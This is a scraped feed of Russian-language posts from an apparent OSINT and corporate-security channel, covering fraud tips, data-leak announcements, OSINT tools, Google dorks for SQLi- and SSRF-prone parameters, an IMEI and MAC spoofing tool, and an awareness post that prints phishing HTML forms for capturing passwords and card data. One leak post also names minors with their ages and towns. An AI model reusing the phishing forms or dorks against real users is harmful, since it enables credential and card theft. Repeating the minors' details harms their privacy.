-
Интернет-Розыск.рф - это информационно-аналитическая компания, занимающаяся предупреждением и расследованием преступлений против субъектов бизнеса. Сфера деятельности: корпоративная безопасность.
⚪️Черная пятница на носу, а значит, нас ждут… Да что вы, какие скидки. Ждут нас сети мошенников, которые стараются заполучить наши денежки, с которыми в «дни больших распродаж» россияне с радостью расстаются. По некоторым оценкам, в сезон распродаж число случаев мошенничества взлетает на 30%. И чем ближе «Черная пятница», которая этом году приходится на 29 ноября, тем выше у любителей онлайн-шопинга риск быть обманутыми - пишет KP.RU.
Всегда проверяйте URL сайта. Он должен совпадать с официальным адресом бренда, - настоятельно рекомендует генеральный директор компании Интернет-Розыск.рф Игорь Бедеров. - Обратите внимание на наличие протокола безопасности (https, а не http) и символ замка в адресной строке. Также рекомендуется изучить регистрационные данные домена сайта в любом из общедоступных сервисов WHOIS (whois.ru, reg.ru/whois, who.is и т. д., - Ред.). Домен надежной организации не может быть зарегистрирован месяц назад, находиться в непонятной юрисдикции и принадлежать анониму. Если предложение кажется слишком хорошим, чтобы быть правдой, вероятнее всего, это мошенничество. Бесплатный сыр бывает только в мышеловках. Также всегда полезно искать отзывы о магазине на независимых платформах.
Проверяйте отправителя и не переходите по подозрительным ссылкам, - говорит Игорь Бедеров. - В крайнем случае, проверяйте такие гиперссылки в антивирусе. Избегать предзаказов на незнакомых ресурсах, особенно если они требуют вводить данные карты. Используйте официальные приложения и сайты для покупок, а также изучайте условия возврата и гарантии.
Защитите свои устройства с помощью антивирусных программ и регулярно обновляйте их, - добавляет правил безопасности Игорь Бедеров. - Настройте двухфакторную аутентификацию и дополнительные облачные пароли защиты для своих учетных записей. Запретите проведение оплат посредством SMS-команд банку и не храните пароли к онлайн-сервисам в своем браузере. Используйте для этого менеджер паролей.
☝️😉👍 А мне лично зашло! Автору - респект!!!
▫️Как проверить контрагента без регистрации и СМС. Часть 1
▫️Как проверить контрагента без регистрации и СМС. Часть 2
▫️Как проверить контрагента без регистрации и СМС. Часть 3
▫️Как проверить контрагента без регистрации и СМС. Часть 4
▫️Как проверить контрагента без регистрации и СМС. Часть 5
▫️Как проверить контрагента без регистрации и СМС. Часть 6
База данных пользователей интернет-магазина одежды, снаряжения для охоты, рыбалки и силовых структур «БШФ+» стала доступна в интернете.
Утечка затронула персональную информацию 5000 пользователей сайта и 17000 заказов.
Актуальность - 20.03.2024
Состав
▪️ФИО
▪️Почта
▪️Телефон
▪️Адрес доставки
▪️ip-адрес
#утечка
😆😂 "База" о киберразведчиках и военно-политических аналитиках от Игоря Ашманова. Красиво, чесслово!
Читать полностью…
🔤 SEON — это инструмент для предотвращения мошенничества, который создает подробные цифровые следы пользователей, анализируя их адреса электронной почты, номера телефонов и IP-адреса. SEON проверяет все присутствие человека в сети — его аккаунты в социальных сетях, цифровую активность и поведение устройств. Пробный период: 500 проверок/месяц.
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #TOOLS #SEON
А вот и трансляцию выложили...
📱 https://vk.com/video-26514504_456245505
ODIN
IP search engine.
Search by ip, domain name, ASN, geolocation, BGP prefix, ASN number, WHOIS updated date and other parameters.
search.odin.io
Creator twitter.com/OdinThreatIntel
#osint
Sandee - подробная карта пляжей планеты.
Бесплатный общедоступный сервис, где можно найти даже малоизвестные пляжи, в самых разных странах мира.
Позволяет узнать подробности о пляже вместе с фотографиями.
https://sandee.com/map
👉 Подписывайтесь на OSINT Беларусь
🔤 Global Brand Database - глобальная база брендов. Можно искать по названию, по части названия, по фото, по правообладателю и по стране. Можно скачать, как найденные результаты по бренду, так и выписку по нужной стране.
➡️https://branddb.wipo.int
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #TOOLS #BRAND
База данных пользователей профессионального инструмента для работы на Рынке Детских Товаров RDT-info.ru в формате организации выставок - стала общедоступной.
Несмотря на то, что на сайте публикуются данные о 20 000 уникальных посетителей в месяц, утечка затронула только 1500 реальных пользователей, причём многие из них не заходили на сайт уже десятки лет.
Актуальность - 20.11.2024
Состав
▪️ФИО
▪️Почта
#утечка
☝️😉 Мы не сидим сложа руки... Форум ИТ-Диалог в Санкт-Петербурге. Поучаствовал в обсуждении проблем информационной безопасности или, как это назвали организаторы - "Цифровая деградация. Сокращение цифровых сервисов как ответ на киберугрозы". Было интересно...
Читать полностью…
Хакеры утверждают, что получили доступ к базе одного из лидеров оптического рынка «Айкрафт», сеть магазинов которого насчитывает более 100 городов страны.
В результате утечки было раскрыто 4,1 миллиона данных клиентов и 3500 сотрудников.
Однако к предоставленной выборке клиентов - есть вопросы, например, наличие паспортных данных, места работы, должности или суммы задолженности перед управляющей жилищной компанией.
Актуальность - 18.11.2024
#утечка #Айкрафт #eyekraft
⚡Что-то я захотел написать книгу про проведение расследований по открытым данным...
Читать полностью…
🔤 Android IMEI Changer - программа для смены IMEI идентификаторов на телефоне под архитектурой ARM
➡️https://github.com/Untouchable17/Android-IMEI-Changer
➖ Добавлен скрипт, позволяющий подменять GPS-координаты устройства.
➖ Добавлен скрипт для изменения ID устройства, который позволяет подменять уникальный идентификатор устройства.
➖ Добавлен скрипт для изменения MAC-адреса устройства, который позволяет подменять уникальный идентификатор сетевого интерфейса.
ℹ️ Альтернативный софт:
➡️https://apkresult.com/en/xposed-imei-changer-pro-apk
➡️https://androidmtk.com/download-mobileuncle-apk
➡️https://play.google.com/store/apps/details?id=com.themonsterit.EngineerStarter
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #PHONE #IMEI
Тренды науки и технологий 2025 года
👋 Команда поисково-аналитической платформы INVENTORUS подготовила прогноз по трендам, которые будут определять развитие науки и технологий в ближайшие годы.
🔍 По тематикам запросов найдено и проанализировано более 300 тыс. патентов и 600 тыс. публикаций из 45 стран, вышедших за период с 2020 г. по III кв. 2024 г.
Топ направлений в науке и технологиях:
1️⃣Искусственный интеллект 2.0: переход от машинного обучения к полноценным цифровым партнёрам
Инновации: генеративный ИИ, повышение надёжности и этичности технологий, применение для устойчивого развития
Ограничения: высокая зависимость от качества данных, энергозатраты, вопросы конфиденциальности
2️⃣Квантовый рывок: развитие квантовых вычислений для сверхскоростей и точности
Инновации: гибридные квантово-классические архитектуры, нейроморфные системы
Ограничения: сложности масштабирования и надёжности квантовых технологий
3️⃣Биомедицинские прорывы: создание искусственных органов, клеточная инженерия, медицина на заказ
Инновации: новые материалы для 3D-биопечати, эпигенетическое омоложение, бионические конечности
Ограничения: резистентность опухолей, сложности воспроизведения структурных тканей
4️⃣Декарбонизация и зелёные технологии: ближе к углеродной нейтральности: переработка отходов, зелёные технологии в промышленности
Инновации: возобновляемая энергия, биогаз, устойчивое строительство
Ограничения: несовершенство технологий хранения энергии, риски "зеленого камуфляжа"
5️⃣Цифровое общество: баланс между удобством и зависимостью от технологий
Инновации: суперумное общество, персонализированный маркетинг, цифровая грамотность
Ограничения: цифровое неравенство, влияние технологий на психическое здоровье
❗️Полный отчет здесь. Не забудьте поделиться с коллегами!
#анатитика_и_тренды
🔤 Google Dorks for Bug Bounty - движок включает в себя множество потрясающих dorks для, например, облачного хранилища, параметров SQLi Prone, параметров SSRF Prone, конечных точек API и многого другого.
➡️https://taksec.github.io/google-dorks-bug-bounty/
➡️https://github.com/TakSec/google-dorks-bug-bounty/
ℹ️ Альтернативные сервисы:
➡️https://dorks.faisalahmed.me/#
➡️https://nitinyadav00.github.io/Bug-Bounty-Search-Engine/
➡️https://pentest-tools.com/information-gathering/google-hacking
➡️https://elite-google-dorks-search-by-biscuit.vercel.app/
🍪 Поддержать канал
📱 НАШИ КОНТАКТЫ
#⃣ #OSINT #DORK #BUG
⚡Комитет Госдумы по госстроительству и законодательству рекомендовал палате парламента принять во втором чтении законопроект, вводящий уголовную ответственность за создание или обеспечение работы сайтов, страниц сайтов и программ, предназначенных для незаконного оборота персональных данных.
Рекомендовать Государственной думе принять во втором чтении проект федерального закона №502113-8 "О внесении изменений в Уголовный кодекс Российской Федерации". <…> Предложить Совету Государственной думы включить указанный законопроект в проект порядка работы Государственной думы для рассмотрения во втором чтении на 26.11.2024
🦠 Знаете ли вы, что Gmail позволяет использовать HTML-тег <form> ? Эта функция представляет потенциальную угрозу безопасности, особенно при попытке украсть учетные данные пользователя или конфиденциальную информацию. Учитывайте этот риск в процессе обеспечения ИБ.
1⃣Пример кода, выводящего форму для кражи пароля
<form action= "https://httpbin.org/post" method= "POST" >
< input type = "email" name= "email" placeholder= "Email or phone" required>
< input type = "password" name= "password" placeholder= "Password" required>
< input type = "submit" value= "Next" >
</form>
<!DOCTYPE html >
< html lang = "en" >
< head >
< meta charset = "UTF-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1.0" >
< title > Оплата кредитной картой </ title >
</ head >
< body >
< div class = "payment-container" >
< h2 > Оплата кредитной картой </ h2 >
< form action = "https://httpbin.org/post" method = "POST" >
< label for = "cardholder-name" > Имя владельца карты</label> < input type
= " text " id = " cardholder-name" name = "cardholder_name" placeholder = "John Doe" обязательно > <label for = "card-number" > Номер карты</label> < input type = " number " id =
" card - number " name = "
card_number " placeholder = " 1234 5678 9012 3456" обязательно > <label for = "expiry-date" > Дата истечения срока действия</label> < input type = " text " id =
" expiry - date " name = " expiry_date
" placeholder = " MM / YY " обязательно > < label for = " cvv " >
CVV </label> < input type = " number
" id = " cvv " name = " cvv " placeholder = " 123" обязательно >
< input type ="submit" value = "Оплатить сейчас" >
</ form >
</ div >
</ body >
</ html >
База данных с информацией о 70 000 пользователях хостинга серверов Minecraft apexnodes.xyz стала общедоступной.
Интересно, что владельцами хостинга являются три подростка, среди которых - основатель Амир (14 лет, Уральск, Казахстан) и ответственный за финансы Руслан (16 лет, Липецк, Россия) - индивидуальный предприниматель создавший юридическое лицо для приема платежей.
Только вот, штрафы для юридических лиц за утечку персональных данных составляют от 1 до 6 миллионов рублей за первое нарушение и до 18 миллионов рублей за повторную утечку, согласно п.9 ст. 13.11 КоАП РФ.
Состав
▪️Почта
▪️Логин
▪️Хэш-пароля
▪️IP-адрес
Хотим обратить внимание ребят, что для того чтобы считаться «оператором обработки персональных данных», необходимо быть включённым в реестр операторов, обрабатывающих персональные данные.
Однако ИП Руслана и британская компания в этом реестре не значатся.
Пока им ничего не грозит (фактической утечки ПДн нет), но видимо Руслан и его родители сейчас очень сильно напряглись...ведь отвечать именно ему.
#утечка
🖥 Подборки полезного софта для ПК
https://sourceforge.net — один из самых больших в мире каталогов открытого ПО.
https://www.producthunt.com — популярная онлайн-платформа, созданная для поиска новых продуктов, стартапов и инновационных решений на рынке технологий.
https://alternativeto.net — сервис помогает находить альтернативы любимым продуктам.
https://alternative.me — сайт для поиска альтернативного программного обеспечения.
https://openalternative.co — каталог open-source софта.
https://www.fosshub.com — большой каталог популярного софта.
https://hub.docker.com — платформа для хранения и обмена контейнерами Docker, где разработчики могут находить, загружать и делиться контейнерами для быстрого развертывания приложений.
https://www.comss.ru/list.php?c=security — большая подборка программ, связанных с безопасностью.
🖥 Реестр доверенного российского ПО от Минцифры
https://reestr.digital.gov.ru/reestr/
🖥 Подборки с полезным софтом для Android
https://f-droid.org — бесплатное и открытое программное обеспечение для Android.
https://www.rustore.ru — российский официальный магазин приложений для Android.
🖥 Подборка ПО для железа/hardware
https://www.aida64.com/downloads — приложение для тестирования производительности системы, диагностика и получение информации о ПК.
https://www.techpowerup.com/gpuz — бесплатная утилита для отображения технической информации о видеоадаптере.
https://www.cpuid.com/softwares/cpu-z.html — бесплатная прикладная утилита для отображения технической информации о персональном компьютере.
https://getfancontrol.com — утилита для управления скоростью вентиляторов (CPU, GPU, системной платы, жёстких дисков).
https://crystalmark.info/en/software/crystaldiskinfo — подробная информация о HDD/SSD, показывает состояние "здоровья" и температуру нагрева.
🖥 Portable-версии популярного софта (без установки в реестре)
https://portableapps.com
🖥 Коллекция полезных утилит от Нира Софера
https://www.nirsoft.net
🖥 Коллекция полезных бесплатных утилит от Марка Руссиновича
https://live.sysinternals.com
🔎 Команда Яндекса разработала бесплатный онлайн-курс для учащихся 7-9 классов, посвящённый базовым правилам безопасного поведения в интернете. В рамках детективного квеста школьникам предлагается распознавать мошеннические сайты, защищать свои аккаунты и создавать надёжные пароли. Мы такое любим!
1⃣ Защита аккаунтов
2⃣ Выявление фишинга
🥱 В сети нашли (спустя пару недель после моей публикации) способ сдеанонить администраторов Telegram-каналов с помощью кастомных эмодзи или стикеров... Особую пикантность этой истории придает тот факт, что данная новация была мной описана еще в 2022 г. в работе "Получение криминалистически значимой информации из мессенджера Telegram: практическое пособие" — Москва: Московская Академия СК России. Стоит ли уточнять, как давно она была известна фактически?
😭 Вот такой у нас OSINT... не умеем даже своевременно подхватить и перевести на великий и могучий посты западных блогеров. Грустно...
База данных одного из интернет-магазинов сети Vsemayki.ru, представленного на сайте shop-clothing.ru, оказалась в открытом доступе.
Утечка одного сайта из сети интернет-магазинов, специализирующихся на создании одежды и аксессуаров с принтами, затронула 932 000 клиентов.
Состав
▪️ФИО
▪️Почта
▪️Телефон
#утечка #vsemayki
📱 В Telegram активно развиваются Mini Apps (мини-приложения). Собственно они и вбили последний гвоздь в легенду о приватности мессенджера. Напомню, что один только Hamster Kombat успешно идентифицировал (при помощи WebGL) более 300 млн. пользователей. Уже более 500 миллионов пользователей Telegram каждый месяц взаимодействуют с различными мини-приложениями. Криптокошелек Telegram заявил о готовности раскрывать данные пользователей.
Читать полностью…
📓 OPEN SOURCE INTELLIGENCE FOR COUNTERTERRORISM
Читать полностью…